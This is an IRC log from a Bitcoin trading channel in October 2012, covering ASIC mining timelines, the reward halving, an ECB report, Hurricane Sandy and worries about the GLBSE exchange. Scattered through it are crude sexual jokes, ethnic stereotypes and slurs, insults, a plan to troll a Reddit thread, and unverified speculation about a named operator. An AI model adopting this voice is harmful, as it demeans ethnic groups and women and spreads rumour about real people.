20:21:56 hey, i wanna troll reddit a little, anyone with me ? Oct 29 20:31:02 mircea_popescu: in what way? Oct 29 20:32:18 in the way of go here http://www.reddit.com/r/funny/comments/12ad2u/as_julia_a_moore_would_have_said_the_storm_that/ and post something like Oct 29 20:32:19 On one bright and pleasant morning His uncle thought it would be nice To take his dear little nephew Down to play upon a raft Where he was to work upon it, An this little child would company be - The raft the water[i] rushed around it, Yet he the danger did not see[k]. This little child knew no danger – Its little soul was free from sin – He was looking in the water, When, alas, this child fell in. Oct 29 20:32:25 or w/e other julia moore quote you find adequate. Oct 29 20:35:10 how'd i do? Oct 29 20:38:57 lol Oct 29 20:39:08 i wonder if we manage to get them in wtf mode Oct 29 20:42:56 [MPEX] [S.MPOE] 14914 @ 0.00045983 = 6.8579 BTC [-] Oct 29 20:45:14 we'll see, i think /r/funny has a high turnover rate Oct 29 20:45:42 so it could be hit-or-miss as to whether or not it even gets noticed really Oct 29 20:46:32 [MPEX] [S.MPOE] 500 @ 0.00046158 = 0.2308 BTC [+] Oct 29 20:47:18 yeah Oct 29 20:47:30 also too much of an insider joke i suspect Oct 29 20:48:02 since memes nobody really understands cultural references anymore. at least not of the useless young crowd. Oct 29 20:51:58 mircea_popescu: how old are you? Oct 29 20:52:14 thirty something. Oct 29 20:52:21 ah, 31 Oct 29 20:52:43 nah, im from the 70s Oct 29 20:53:00 oh, so 33 Oct 29 21:02:32 [MPEX] [S.MPOE] 500 @ 0.00046158 = 0.2308 BTC [+] Oct 29 21:04:51 I'm 12 Oct 29 21:05:13 youngest dad in all midwest ? Oct 29 21:05:22 no, it's common out here Oct 29 21:05:40 tucson does have some young parents. Oct 29 21:05:58 oh yeah, i'm not in th midwest anymore Oct 29 21:06:09 i was sitting in the ER @ UMC this one day, and these kids had a baby who was like, coudln't have been more than 5 months old, maybe 8? Oct 29 21:06:22 http://polimedia.us/dtng/c/src/134298763072.jpg somewhat related Oct 29 21:06:56 hardly had 3 teeth in its mouth -- had the flu, fever, all the junk -- these "parents" were feeding the kid french fries from McD's Oct 29 21:07:08 woah, that's an awesome pic mircea_popescu Oct 29 21:07:15 all the while the kid screamed. Oct 29 21:07:24 i think i might have finally gotten to the bottom of the child porn aggitations Oct 29 21:07:27 mod6: :o that's aweful Oct 29 21:07:36 mod6 that's a sad story Oct 29 21:07:36 er, awful Oct 29 21:08:15 hah, just some wild stuff i'd seen while there. it was like, "o the kid is sick?! flu, fever, shits? GET HIM A HAPPY MEAL!" Oct 29 21:09:09 i do like the feel of mcd's when i'm hungover Oct 29 21:09:22 it's gotta be the same for a kid with the flu and the shits Oct 29 21:09:37 haha Oct 29 21:09:45 i love tucson though Oct 29 21:09:51 i hate to talk any shit Oct 29 21:10:05 but anyway, some of the "parents" there are just children themselvs. Oct 29 21:10:28 well, i don't mind shittalking parents who are likely shortening their kids life like that Oct 29 21:11:07 i just see stuff like that and think "ugh, that kid will be a diabetes amputee in like 18 years." Oct 29 21:11:45 lol Oct 29 21:11:53 ;D Oct 29 21:12:18 haha. oh well. its a brave new world out there. Oct 29 21:12:28 GIVE ME MY CHICKEN NUGGETS! Oct 29 21:12:37 we just gotta last until the singularity Oct 29 21:14:22 gotta find youself a hide out spot on Mt. Lemmon or in the Chiricahua's like Geronimo Oct 29 21:15:00 have you gone to Nogales yet? Oct 29 21:15:13 nope, we actually just finished unpacking Oct 29 21:15:27 ahh, werd. :) Oct 29 21:15:29 this place is smaller than the place we were at before Oct 29 21:15:37 so it was challenging Oct 29 21:15:56 I did find a decent dive bar Oct 29 21:16:02 "the bay horse" Oct 29 21:16:32 i know it :D Oct 29 21:16:32 cash only, 2 usd gets you a mini-pitcher of pbr Oct 29 21:17:01 smickles dood you've unpacked for two weeks Oct 29 21:17:10 pretty much Oct 29 21:17:35 what was it, 7200 FN-FAGs ? Oct 29 21:17:38 I used to hang @ the tap-room quite a bit Oct 29 21:17:42 we went from a 1600 ft² place to a 100 ft² place Oct 29 21:17:47 The Hotel Congress Oct 29 21:17:51 100 sq ft ?! Oct 29 21:17:51 1000* Oct 29 21:17:55 lol Oct 29 21:18:02 MY MATRESS IS 100 SQ FT Oct 29 21:18:07 HAH Oct 29 21:18:22 sounds like my place on Grant & Alvernon Oct 29 21:19:08 i'm near glenn and campbel Oct 29 21:19:14 er Oct 29 21:19:16 grant Oct 29 21:19:19 not glenn Oct 29 21:19:30 glenn is the next street up, i think Oct 29 21:19:53 ahh sure. Oct 29 21:20:11 so the sun goes down and a million university girls start running around Oct 29 21:20:13 i don't live there anymore, but I'm STILL the mayor. Oct 29 21:20:24 mr. smickles do you never sleep? Oct 29 21:20:30 i wss so tired this morning Oct 29 21:20:34 I <3 UofA girls Oct 29 21:20:40 i sleep about 6 hours a day, maybe Oct 29 21:20:45 monopoly tonight? Oct 29 21:20:50 :) Oct 29 21:20:55 sure :) Oct 29 21:20:58 use betta client Oct 29 21:21:04 :P mr. lag Oct 29 21:21:04 hopefully this other client is better Oct 29 21:21:12 2 up votes 2 down votes Oct 29 21:21:16 seems like no. Oct 29 21:21:21 mircea_popescu: the down are probably fake Oct 29 21:21:24 If you wanna try a good pizza, try Zachery's Pizza @ the UofA -- total hole in the wall, but good pizza & beer. Oct 29 21:21:26 fake ? Oct 29 21:21:38 reddeit has a system to hide votes so people don't game it somehow Oct 29 21:21:54 https://maps.google.com/maps?q=zacherys+pizza+tucson&hl=en&ll=32.237343,-110.955477&spn=0.040511,0.084543&sll=32.256017,-110.918784&sspn=0.010126,0.021136&t=h&gl=us&hq=zacherys+pizza&hnear=Tucson,+Pima,+Arizona&z=14&iwloc=A Oct 29 21:21:57 huh ?! Oct 29 21:22:02 bah, long url sorry. Oct 29 21:23:31 mod6: bookmarked :) Oct 29 21:24:13 mircea_popescu: it pops in fake votes that don't count so that people don't just vote on what is popular, or something like that Oct 29 21:24:21 o ?! Oct 29 21:24:44 if you really want to know, it's open source, go look at the code Oct 29 21:24:55 lol shit, it says "This place has closed or moved." Oct 29 21:24:57 https://github.com/reddit/reddit Oct 29 21:25:13 mod6: if it's still in business, i'll find it Oct 29 21:25:22 what are we redditting? Oct 29 21:25:31 smickles: im gonna call 'em, and find out. Oct 29 21:25:50 mircea_popescu: https://github.com/reddit/reddit/blob/master/r2/r2/controllers/promotecontroller.py might be it Oct 29 21:26:23 WOW phone number is disconned lol Oct 29 21:26:33 well, so much for that Oct 29 21:26:50 too bad Oct 29 21:26:53 thestringpuller go to http://www.reddit.com/r/funny/comments/12ad2u/as_julia_a_moore_would_have_said_the_storm_that/ Oct 29 21:27:01 paste some julia moore quote you find appropiate Oct 29 21:27:18 mod6 so since you left all the girls are gone and the places are all closed up ? Oct 29 21:27:24 you sound a lot like me... Oct 29 21:27:48 mircea_popescu: likes em young Oct 29 21:28:09 [MPEX] [S.MPOE] 20700 @ 0.00046158 = 9.5547 BTC [+] Oct 29 21:28:28 i like 'em wet. Oct 29 21:28:35 haha Oct 29 21:28:59 i left in the summer of 09 -- Had enough working nights at walmart. Oct 29 21:29:15 in the summer of 69... Oct 29 21:29:20 ;;google summer of 69 Oct 29 21:29:20 haha Oct 29 21:29:21 Bryan Adams - Summer of 69 - YouTube: ; Summer of '69 - Wikipedia, the free encyclopedia: ; Bryan Adams - Summer Of '69 Lyrics: Oct 29 21:29:28 fucking bryan adams Oct 29 21:29:30 lol Oct 29 21:29:37 great song too Oct 29 21:29:53 but yeah, I worked at that IBM down there in Rita Ranch Oct 29 21:29:57 then the crash came... Oct 29 21:30:21 then everyone lost their jobs... so mod6 took a night cashier job on the east side Oct 29 21:30:53 Jimmy quit, Jody got married Oct 29 21:30:53 Shoulda known, we'd never get far Oct 29 21:30:53 Oh when I look back now Oct 29 21:30:53 That summer seemed to last forever Oct 29 21:30:53 And if I had the choice Oct 29 21:30:53 Yeah, I'd always want to be there Oct 29 21:30:53 Those were the best days of my life Oct 29 21:32:35 anyway, after 9 months of that bullshit, i decided to leave tucson for a better job :( Oct 29 21:32:35 ;;google dirt off your shoulder Oct 29 21:32:36 JAY-Z - Dirt Off Your Shoulder - YouTube: ; JAY Z Dirt Off Your Shoulder - YouTube: ; Dirt off Your Shoulder - Wikipedia, the free encyclopedia: Oct 29 21:33:12 it was a horrible time to be looking for a job then. Oct 29 21:33:48 mod6 it still is innit ? Oct 29 21:34:31 well... it depends on the location really. Oct 29 21:34:59 there are TONS of jobs for exp. programmers out there now Oct 29 21:35:29 but at the time of the crash, if anyone had a job, and made it past the budget cuts, they weren't moving out of them so it was a really hard thing to find new positions at the time. Oct 29 21:35:44 but i moved back to minneapolis and found a good software gig in 2 months. Oct 29 21:35:58 sell drugs mang Oct 29 21:36:03 hustle yo shit Oct 29 21:36:12 tucson doesn't have much in IT except IBM or Raytheon (which requires Top Secret Clearence) Oct 29 21:36:19 there is TI too, but its a small outfit there. Oct 29 21:36:28 thestringpuller: haha, werd. Oct 29 21:36:33 mod6 can you rap? Oct 29 21:36:37 f no Oct 29 21:36:45 im 32 Oct 29 21:36:47 and white Oct 29 21:36:52 i have no business trying to rap. Oct 29 21:37:04 32 yo white programmers are the best rappers i hear Oct 29 21:37:07 eminem is 40 Oct 29 21:37:13 those who don't get sidetracked into bball careers Oct 29 21:37:17 but i like rap very much, dre/eazy-e/snoop/jeezy Oct 29 21:37:32 i only like female rappers. Oct 29 21:37:38 but im mostly into punk music i think. Oct 29 21:37:58 i will slap you mp if you like nikki minaj Oct 29 21:38:20 wat about MIA?! Oct 29 21:38:27 i mostly like the ones that also strip. Oct 29 21:38:31 shes kinda a rapper Oct 29 21:39:29 hey, a strapper. that's a kickass idea. Oct 29 21:39:34 why don't they have this already ? Oct 29 21:40:03 cause rap objectifies women enough? Oct 29 21:40:19 M. O. B. Oct 29 21:40:20 ^^^^^^^^ Oct 29 21:40:26 busty girl beatboxes while taking off her clothes and then proceeds to peg haples whiteboys in the audience with her monstruous pink strap-on Oct 29 21:40:48 sounds like a korean film Oct 29 21:40:54 :P Oct 29 21:40:56 I SAID BUSTY Oct 29 21:40:58 haha Oct 29 21:41:00 :D Oct 29 21:41:23 ive seen busty koreans before Oct 29 21:41:27 they are rare Oct 29 21:41:30 :P Oct 29 21:41:33 he said rare Oct 29 21:41:42 ;;ticker Oct 29 21:41:42 BTCUSD ticker | Best bid: 10.56616, Best ask: 10.63899, Bid-ask spread: 0.07283, Last trade: 10.64900, 24 hour volume: 45833.02822306, 24 hour low: 10.32090, 24 hour high: 10.95000, 24 hour vwap: 10.66578 Oct 29 21:42:42 berry punny Oct 29 21:53:11 [MPEX] [S.MPOE] 29377 @ 0.00046311 = 13.6048 BTC [+] Oct 29 21:53:13 [MPEX] [S.MPOE] 2300 @ 0.00046384 = 1.0668 BTC [+] Oct 29 21:53:14 [MPEX] [S.MPOE] 11023 @ 0.00046641 = 5.1412 BTC [+] Oct 29 22:18:34 [MPEX] [S.MPOE] 5939 @ 0.00046641 = 2.77 BTC [+] Oct 29 22:31:10 lol, ECB fears that bitcoin incidents can have negative impact to its reputation Oct 29 22:31:36 http://www.ecb.europa.eu/pub/pdf/other/virtualcurrencyschemes201210en.pdf Oct 29 22:32:49 "Although in practical terms virtual currency schemes are only an evolution, from a conceptual Oct 29 22:32:49 point of view they do present substantial changes when compared to real currencies and payment Oct 29 22:32:49 systems. Oct 29 22:32:49 " Oct 29 22:32:54 who the fuck wrote that ;/ Oct 29 22:33:57 "do indeed fall within central banks’ responsibility as a result of characteristics shared with Oct 29 22:33:57 payment systems, which give rise to the need for at least an examination of developments and the provision of an initial assessment." Oct 29 22:34:00 like hell. Oct 29 22:34:34 the ecb needs a license from me to pursue any activity in the btc space. Oct 29 22:34:43 i hope that's adequately clear to them. Oct 29 22:38:00 did you already issue some licenses? to whom? Oct 29 22:38:06 lol Oct 29 22:38:22 no, it would be my first time. Oct 29 22:39:27 you should have told nefario... if he wants to be regulated, you can do it Oct 29 22:43:10 tell mpoe-pr to write to btctalk: "Mircea Popescu now offers proper regulationary oversight to btc activities" Oct 29 22:44:29 [MPEX] [S.MPOE] 26800 @ 0.00046641 = 12.4998 BTC [+] Oct 29 22:45:19 regulationary lol Oct 29 22:45:30 in romanian "to regulate" would kinda mean to fuck. Oct 29 22:45:43 lol Oct 29 22:59:45 in truth tho, central banks are pretty much fucked. Oct 29 23:00:05 as bitcoin develops and the uselessness of their scrip will become more and more apparent Oct 29 23:00:19 the uninformed public will for sure frame it as "central banks aren't doing enough!!11" Oct 29 23:00:24 as if there actually is something to do. Oct 29 23:10:35 [MPEX] [S.MPOE] 27500 @ 0.00046602 = 12.8156 BTC [-] Oct 29 23:29:38 micrea there is something to do: mine coins! central banks aren't mining enough! Oct 29 23:29:57 s/micrea/mircea/ Oct 29 23:35:45 [MPEX] [S.MPOE] 22600 @ 0.00046602 = 10.5321 BTC [-] Oct 29 23:37:39 as long as the block keep coming 6 an hour i think there's enough mining Oct 29 23:37:51 nope not enough Oct 29 23:38:05 never enough! Oct 29 23:38:11 print more coins Oct 29 23:40:41 "I'm a girl looking for a loan" Oct 29 23:40:44 her name is underminer. Oct 29 23:41:17 what are her terms Oct 29 23:41:41 tits or nobody cares Oct 29 23:41:47 srsly Oct 29 23:41:58 lol hi Lyspooner Oct 29 23:43:04 hi, i just finished the ecb report on virtual currencies Oct 29 23:43:35 there are some continuity issues with Linden Dollars thrown in Oct 29 23:43:50 actually... the only PERSON i ever lended money to Oct 29 23:44:00 got a gender surgery thingee BECAME a chick. Oct 29 23:44:37 oh i see. does gender surgery allow one to pay dividends in bitcoins? Oct 29 23:44:50 mircea_popescu, to pay you back in tits. q.e.d. Oct 29 23:45:05 nah, i got stiffed. Oct 29 23:45:13 (i'll continue stfu now) Oct 29 23:46:10 https://bitcointalk.org/index.php?topic=121195.msg1305832#msg1305832 hahaha totally pegged him Oct 29 23:49:46 http://i.imgur.com/bXVWg.png teh suck ;/ Oct 29 23:50:35 what is that chart Oct 29 23:52:18 satoshidice profits. Oct 29 23:53:16 http://goo.gl/zJBdq --- 16,000-square-mile (41,000 km2) urban area that is 26 times larger geographically than Greater London, or about the same size as the Netherlands, with a population of over 56 million (not including Hong Kong or Macau)... Oct 29 23:53:17 ...compared to the combined statistical area for NYC which is only 22 million people. I spend most of my life living in or on the edge of louisville's combined statistical area, which is only aprox 1.45 million people (seems that buffalo is only 1.2 million) Oct 29 23:53:24 full-blown natural disaster in guangzhou china would make this east coast storm look rather trivial. Oct 29 23:53:31 oh, sorry. wrong window. Oct 29 23:53:42 ahahaha Oct 29 23:53:55 touch da sky! Oct 29 23:54:42 they don't have a bunch of jewish princesses lined up in guangzhou Oct 29 23:54:51 hence all the bitching and moaning about east coast. Oct 29 23:55:02 yeah uh... I live a couple hours south of buffalo with various "upstate rednecks" as neigbours. whee! Oct 29 23:56:56 mircea_popescu: I don't understand. israel isn't structured in such a way as to have a royal family / nobles / prince and princess I didn't think. Oct 29 23:57:17 ;;google jewish princess Oct 29 23:57:18 "jewish princess" ? Oct 29 23:57:18 Jewish-American princess stereotype - Wikipedia, the free ...: ; Jewish Princess Lyrics - Frank Zappa: ; Frank Zappa - Jewish Princess - YouTube: Oct 29 23:57:52 kuzesta i believe he said that there are no jewish princesses lined up in guangzhou. such a statement should appear true to you Oct 29 23:59:53 huh Oct 30 00:00:10 ethnic slurs confuse me for the most part Oct 30 00:00:20 I don't wish to do any further reading on the matter. Oct 30 00:00:56 [MPEX] [S.MPOE] 5601 @ 0.00046353 = 2.5962 BTC [-] Oct 30 00:01:45 next week kosher deli's gonna be an ethnic slur Oct 30 00:04:46 surfs up in NYC nao Oct 30 00:04:50 http://www.ndbc.noaa.gov/station_page.php?station=44065 Oct 30 00:06:12 is it a full moon too btw ? Oct 30 00:06:21 yep Oct 30 00:06:35 kuzetsa looks like a starving armenian Oct 30 00:06:45 expecting 11ft above normal surge Oct 30 00:07:20 46/60 that's pretty windy Oct 30 00:07:34 pigeons my money's on dub pollack Oct 30 00:07:58 wat Oct 30 00:08:48 practicing semislurs Oct 30 00:09:48 semi ramides. Oct 30 00:10:18 dub may be no pole, but pole be dub. Oct 30 00:11:43 I like to think of myself being as genetically removed from Luke-Jr as possible Oct 30 00:15:34 pigeons: "starving armenian" ??? Oct 30 00:16:45 dub congratulations, you're a short girl with buckteeth and freckles. Oct 30 00:18:01 :/ Oct 30 00:18:35 mircea_popescu: shut up plskthx. you're sucking up my chatlogs. Oct 30 00:19:36 kuzetsa are you stupid naturally or does it take some particular effort ? Oct 30 00:21:04 give for my the books :P Oct 30 00:21:50 haha dub Oct 30 00:26:05 [MPEX] [S.MPOE] 21285 @ 0.00046329 = 9.8611 BTC [-] Oct 30 00:26:07 [MPEX] [S.MPOE] 10115 @ 0.00046299 = 4.6831 BTC [-] Oct 30 00:28:31 https://bitcointalk.org/index.php?topic=120909.0 this thing lol Oct 30 00:31:48 round the prickly pear we go again Oct 30 00:33:51 site source omfg? Oct 30 00:34:49 lol Oct 30 00:52:12 [MPEX] [S.MPOE] 18100 @ 0.00046311 = 8.3823 BTC [+] Oct 30 01:17:22 [MPEX] [S.MPOE] 8400 @ 0.00046299 = 3.8891 BTC [-] Oct 30 01:37:16 touch da sky! Oct 30 01:37:26 [MPEX] [S.MPOE] 17300 @ 0.00046311 = 8.0118 BTC [+] Oct 30 01:37:27 [MPEX] [S.MPOE] 2399 @ 0.00046353 = 1.112 BTC [+] Oct 30 01:37:29 [MPEX] [S.MPOE] 4538 @ 0.00046641 = 2.1166 BTC [+] Oct 30 01:37:30 [MPEX] [S.MPOE] 23336 @ 0.00047019 = 10.9724 BTC [+] Oct 30 01:37:31 [MPEX] [S.MPOE] 6800 @ 0.00047139 = 3.2055 BTC [+] Oct 30 01:37:32 [MPEX] [S.MPOE] 28500 @ 0.00047292 = 13.4782 BTC [+] Oct 30 01:37:32 [MPEX] [S.MPOE] 24265 @ 0.00047519 = 11.5305 BTC [+] Oct 30 01:37:34 [MPEX] [S.MPOE] 1409 @ 0.00047612 = 0.6709 BTC [+] Oct 30 01:37:35 [MPEX] [S.MPOE] 24923 @ 0.00047661 = 11.8786 BTC [+] Oct 30 01:37:36 [MPEX] [S.MPOE] 12920 @ 0.00047714 = 6.1646 BTC [+] Oct 30 01:37:36 fuck Oct 30 01:37:37 [MPEX] [S.MPOE] 6100 @ 0.00047769 = 2.9139 BTC [+] Oct 30 01:37:38 [MPEX] [S.MPOE] 6867 @ 0.00047907 = 3.2898 BTC [+] Oct 30 01:37:39 [MPEX] [S.MPOE] 43200 @ 0.00047955 = 20.7166 BTC [+] Oct 30 01:37:40 [MPEX] [S.MPOE] 17443 @ 0.00047992 = 8.3712 BTC [+] Oct 30 02:03:12 [MPEX] [S.MPOE] 18000 @ 0.00047264 = 8.5075 BTC [-] Oct 30 02:03:13 [MPEX] [S.MPOE] 12800 @ 0.00047992 = 6.143 BTC [+] Oct 30 02:13:27 smickles: when we playing monopoly yo? Oct 30 02:28:35 [MPEX] [S.MPOE] 14400 @ 0.00046842 = 6.7452 BTC [-] Oct 30 02:53:51 [MPEX] [S.MPOE] 93 @ 0.00046842 = 0.0436 BTC [-] Oct 30 02:53:53 [MPEX] [S.MPOE] 47300 @ 0.00046515 = 22.0016 BTC [-] Oct 30 03:19:38 [MPEX] [S.MPOE] 49000 @ 0.00046343 = 22.7081 BTC [-] **** BEGIN LOGGING AT Tue Oct 30 10:16:14 2012 Oct 30 10:16:29 smickles haha does it ? Oct 30 10:34:37 [MPEX] [S.MPOE] 22012 @ 0.00046288 = 10.1889 BTC [+] Oct 30 10:34:39 [MPEX] [S.MPOE] 22888 @ 0.00046217 = 10.5781 BTC [-] Oct 30 11:00:16 [MPEX] [S.MPOE] 23612 @ 0.00046217 = 10.9128 BTC [-] Oct 30 11:00:17 [MPEX] [S.MPOE] 12871 @ 0.00045958 = 5.9153 BTC [-] Oct 30 11:00:19 [MPEX] [S.MPOE] 10917 @ 0.00045951 = 5.0165 BTC [-] Oct 30 11:10:44 so everyone was in new york huh Oct 30 11:17:47 everyone except for everyone here Oct 30 11:25:44 [MPEX] [S.MPOE] 13224 @ 0.00045951 = 6.0766 BTC [-] Oct 30 11:25:46 [MPEX] [S.MPOE] 27176 @ 0.00045944 = 12.4857 BTC [-] Oct 30 11:51:26 [MPEX] [S.MPOE] 7624 @ 0.00046374 = 3.5356 BTC [+] Oct 30 11:51:27 [MPEX] [S.MPOE] 34076 @ 0.00046378 = 15.8038 BTC [+] Oct 30 12:16:31 [MPEX] [S.MPOE] 8100 @ 0.00046378 = 3.7566 BTC [+] Oct 30 12:16:32 [MPEX] [S.MPOE] 28600 @ 0.00046395 = 13.269 BTC [+] Oct 30 12:16:33 [MPEX] [S.MPOE] 607 @ 0.00046409 = 0.2817 BTC [+] Oct 30 12:16:34 [MPEX] [S.MPOE] 1100 @ 0.0004642 = 0.5106 BTC [+] Oct 30 12:16:35 [MPEX] [S.MPOE] 893 @ 0.0004664 = 0.4165 BTC [+] Oct 30 12:42:04 [MPEX] [S.MPOE] 7733 @ 0.00045944 = 3.5528 BTC [-] Oct 30 12:42:05 [MPEX] [S.MPOE] 25459 @ 0.00045899 = 11.6854 BTC [-] Oct 30 13:07:12 [MPEX] [S.MPOE] 26454 @ 0.00046311 = 12.2511 BTC [+] Oct 30 13:32:30 [MPEX] [S.MPOE] 4909 @ 0.00045937 = 2.255 BTC [-] Oct 30 13:57:52 [MPEX] [S.MPOE] 41 @ 0.00045899 = 0.0188 BTC [-] Oct 30 13:57:53 [MPEX] [S.MPOE] 7747 @ 0.00045891 = 3.5552 BTC [-] Oct 30 13:57:55 [MPEX] [S.MPOE] 8709 @ 0.00045888 = 3.9964 BTC [-] Oct 30 13:57:55 [MPEX] [S.MPOE] 16800 @ 0.00045881 = 7.708 BTC [-] Oct 30 13:57:56 [MPEX] [S.MPOE] 17103 @ 0.00045872 = 7.8455 BTC [-] Oct 30 14:20:07 was there an anoused delay with bfl or something? Oct 30 14:20:12 im seeing new memes Oct 30 14:23:48 [MPEX] [S.MPOE] 14997 @ 0.00045872 = 6.8794 BTC [-] Oct 30 14:23:50 [MPEX] [S.MPOE] 7385 @ 0.00045845 = 3.3857 BTC [-] Oct 30 14:24:23 urlpls Oct 30 14:48:54 [MPEX] [S.MPOE] 10700 @ 0.00045845 = 4.9054 BTC [-] Oct 30 15:00:46 NY area had similar shit going on in August? Oct 30 15:01:07 Why is this so over hyped? Oct 30 15:03:29 so, do they have sharks inside every time? Oct 30 15:03:31 http://statigr.am/p/313569468615628274_27863972 Oct 30 15:06:14 this is kinda funny :) Oct 30 15:06:35 poor shark, I hope he can get back to his real home alive Oct 30 15:14:34 [MPEX] [S.MPOE] 13491 @ 0.00045845 = 6.1849 BTC [-] Oct 30 15:39:59 [MPEX] [S.MPOE] 22024 @ 0.00045845 = 10.0969 BTC [-] Oct 30 15:40:01 [MPEX] [S.MPOE] 21976 @ 0.00045842 = 10.0742 BTC [-] Oct 30 16:05:07 [MPEX] [S.MPOE] 35502 @ 0.00045937 = 16.3086 BTC [+] Oct 30 16:06:01 EskimoBob it's the 13' storm surge. Massive low pressure zone that raises the ocean level under the storm. Oct 30 16:08:06 Something like a slow tsunami. Oct 30 16:21:04 not sure about low pressure raising ocean Oct 30 16:21:24 high tide + full moon + wind driven surge Oct 30 16:22:06 pressure is going to need to be a LOT lower for water to have lower gravity than air Oct 30 16:23:18 whats the death toll at anyway? Oct 30 16:23:21 dub lower pressure is part of the reason for elevated tide Oct 30 16:24:22 I'd say if it is a part its a functionally imperceptable part Oct 30 16:24:39 Ya, it plays a part in it. There's more than one reason it's so high, that's true. Oct 30 16:24:48 as in a part so small it cannot be measured Oct 30 16:25:51 hey gigavps has bfl delayed their asics? Oct 30 16:26:20 Chaang-Noi did you buy some? Oct 30 16:26:24 last i heard was late nov, but now im hearing next year, but i highly suspect its fud Oct 30 16:26:34 no, i invested in a differnt operation Oct 30 16:26:50 December is what was in their last release to btc mag Oct 30 16:27:00 wiki says im wrong Oct 30 16:27:00 Chaang-Noi invested in an operation? Oct 30 16:27:04 how long ago was that? Oct 30 16:27:06 asic mining Oct 30 16:27:13 with fried cat Oct 30 16:27:34 how is asic mining coming? Oct 30 16:27:36 as you know, who gets their first gets awesome pay:) Oct 30 16:27:42 i dont know Oct 30 16:27:46 10mm of ocean for every millibar Oct 30 16:27:52 they say they should be mining end of nov if all goes well Oct 30 16:28:00 with 12 TH Oct 30 16:28:07 50 TH by Feb Oct 30 16:28:14 or 50 TH more Oct 30 16:28:21 This story claims that the atmospheric pressure will raise the surge by several inches to a foot. http://arstechnica.com/science/2012/10/why-sandys-storm-surge-will-pack-an-unusually-strong-punch-in-nyc/ Oct 30 16:28:56 Chaang-Noi http://bitcoinmagazine.net/butterfly-labs-releases-more-asic-photos/ Oct 30 16:29:15 thanks giga ill read it Oct 30 16:29:31 "scheduled to be released in late November or December." Oct 30 16:30:01 End of november is too late Oct 30 16:30:05 reward drop Oct 30 16:30:08 scheduled hmm, inaba was saying things could go wrong cuz they are not making the stuff Oct 30 16:30:26 asic miner might make it just before the drop Oct 30 16:30:29 reward will drop before december Oct 30 16:30:29 Chaang-Noi they have a foundry making the chips Oct 30 16:30:38 OneMiner: yeah up to 500mm looking at one sensor in nyc Oct 30 16:30:38 no one will make it before the drop Oct 30 16:30:51 seconded Oct 30 16:31:04 i just know what i was told Oct 30 16:31:08 if you haven't done your calculations with 25 btc blocks, you shouldn't be mining Oct 30 16:31:09 [MPEX] [S.MPOE] 10054 @ 0.00045937 = 4.6185 BTC [+] Oct 30 16:31:10 [MPEX] [S.MPOE] 1727 @ 0.00046064 = 0.7955 BTC [+] Oct 30 16:31:12 [MPEX] [S.MPOE] 847 @ 0.00046311 = 0.3923 BTC [+] Oct 30 16:31:13 [MPEX] [S.MPOE] 22000 @ 0.00046425 = 10.2135 BTC [+] Oct 30 16:31:15 dub ya, it's the wind that pushes it up the most. Oct 30 16:31:15 [MPEX] [S.MPOE] 1600 @ 0.00046599 = 0.7456 BTC [+] Oct 30 16:31:17 they are shotting for end of nev for asic miner Oct 30 16:31:21 nov* Oct 30 16:31:25 well shit I fucked up that trade Oct 30 16:31:33 didn't purchase before it went up Oct 30 16:31:34 oh well Oct 30 16:31:41 anyone talked to nefario? Oct 30 16:31:54 not for a long long while Oct 30 16:31:55 I saw a retarded kid at the mall? Oct 30 16:31:56 Reward drop dosen't matter with ASICs. One week of double reward won't matter over the lifetime of the hardware. Oct 30 16:32:17 gigavps: I did Oct 30 16:32:23 OneMiner: you're forgetting about the overall deflation + double reward Oct 30 16:32:30 EskimoBob what did he say and when? Oct 30 16:32:33 if you make it before the reward drop Oct 30 16:32:41 you are hitting real gold Oct 30 16:32:46 few days ago. I called him :) Oct 30 16:33:01 thestringpuller no asics will hit before then Oct 30 16:33:24 asic miner said before the end of Nov.. so even if they do hit it, it wont be much, but it will be 1/4 of the current network Oct 30 16:33:33 gigavps: exactly so the point is moot, you will have to wait for the coins to deflate before it is truly worth it after reward drop Oct 30 16:33:36 thestringpuller sill, even if they release the ASICs sooner that will just cause the difficulty to go up sooner. Being first is important, reward drop isn't so much. Oct 30 16:33:39 unless you have access to buy futures Oct 30 16:33:51 but I don't anyone who sells futures Oct 30 16:34:32 We had a friendly short chat and I asked him to write a short post about the progress. Hi kept is word and updated the blog. When sending out the BTC is completed, he will contact the issuers and start clearing up that mess Oct 30 16:34:51 EskimoBob the site is now down Oct 30 16:34:55 glbse.com Oct 30 16:34:57 Lets hope he keeps his word :) Oct 30 16:34:58 yeah in asics being first is key, and how much first is key... being 1/4 of the net work while the second place asic guy takes 2 more months... well that would be epic Oct 30 16:35:01 fuck Oct 30 16:35:02 so why is he so slow? Oct 30 16:35:24 EskimoBob nefario is no longer answering his phone Oct 30 16:35:41 EskimoBob: did you complain about his lack of tightness? Oct 30 16:35:47 gigavps: https://blog.glbse.com/ is up Oct 30 16:36:20 dub: "tightness"? what are you talking about? Oct 30 16:36:23 i'm starting to get worried that nefario is going to pull a runner Oct 30 16:36:45 moo Oct 30 16:36:54 yeah.. i have been wondering for a while too giga Oct 30 16:37:05 EskimoBob: your pet hate! Oct 30 16:37:08 gigavps: take a trip to UK Oct 30 16:37:10 hi pumpkin.. i want has carve you! Oct 30 16:37:15 why run now Oct 30 16:37:19 why not run a month ago Oct 30 16:37:21 dub: what pet hate? Oct 30 16:37:37 ;;calc 1.32 * 10.70 Oct 30 16:37:37 14.124 Oct 30 16:37:43 EskimoBob: you're always complaining about how loose everyone is Oct 30 16:37:44 like, nef will run with your precious shares? Oct 30 16:37:46 ;;calc 1.32/10.70 Oct 30 16:37:46 0.123364485981 Oct 30 16:37:54 and sell them on silk road? Oct 30 16:38:01 i think it might be that nefario was living off of user funds and does not have enough to pay everyone back... so fake a double payment and fail... this is speculation/FUD Oct 30 16:38:02 dub: you make no sense. Where did I do that? Oct 30 16:38:13 Chaang-Noi: noesss Oct 30 16:38:26 its time! muhahahah Oct 30 16:38:53 EskimoBob: all over the forum, this person is looser that person is looser.. is anyone tight enough for you? Oct 30 16:38:55 :) Oct 30 16:39:10 im tight enought for E Bob! Oct 30 16:39:10 lil boyz Oct 30 16:40:32 ;;calc 1.32/10.83 Oct 30 16:40:32 0.12188365651 Oct 30 16:41:10 dub: looser.. hmm. I must be making same typo over and over again :) "loser" Oct 30 16:42:26 ah.. that makes more sense Oct 30 16:43:40 ;;calc 10.83 - 10.66 Oct 30 16:43:40 0.17 Oct 30 16:44:07 what happens if you send email to support at glbse does it bounce back? Oct 30 16:45:01 dub: your overstatement of "all over the forum" is on a feminine side. Only 3 posts :) Oct 30 16:46:06 must be the sleep deprivation Oct 30 16:46:18 at first i thought the site being down means nothing as he can still pay out, but then i thought, i bet not everyone has made claims... Oct 30 16:47:37 Chaang-Noi: I 